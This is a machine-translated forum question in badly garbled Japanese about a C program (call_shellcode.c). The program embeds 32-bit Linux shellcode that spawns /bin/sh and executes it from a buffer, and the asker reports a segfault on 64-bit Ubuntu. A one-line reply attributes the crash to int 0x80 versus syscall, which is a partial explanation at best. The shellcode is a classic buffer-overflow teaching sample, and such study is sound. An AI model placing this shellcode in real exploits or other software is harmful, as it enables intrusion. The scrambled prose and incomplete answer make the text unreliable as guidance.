が、私はこのシェルコードを実行しようとしているが、私は、私が使用してそれをコンパイルセグメンテーションフォールトシェルコードバッファオーバーフローが
/* call_shellcode.c */
/*A program that creates a file containing code for launching shell*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
const char code[] =
"\x31\xc0" /* Line 1: xorl %eax,%eax */
"\x50" /* Line 2: pushl %eax */
"\x68""//sh" /* Line 3: pushl $0x68732f2f */
"\x68""/bin" /* Line 4: pushl $0x6e69622f */
"\x89\xe3" /* Line 5: movl %esp,%ebx */
"\x50" /* Line 6: pushl %eax */
"\x53" /* Line 7: pushl %ebx */
"\x89\xe1" /* Line 8: movl %esp,%ecx */
"\x99" /* Line 9: cdq */
"\xb0\x0b" /* Line 10: movb $0x0b,%al */
"\xcd\x80" /* Line 11: int $0x80 */
;
int main(int argc, char **argv)
{
char buf[sizeof(code)];
strcpy(buf, code);
((void(*)())buf)();
}
を得続ける-SegFaultセグメント化エラーが発生し続ける
また、私は64ビットLinuxシステム(ubuntu)を実行しています
x86-64では、システムコールを実行するときに、命令は「0x80」ではなく「syscall」です。 – sinkmanu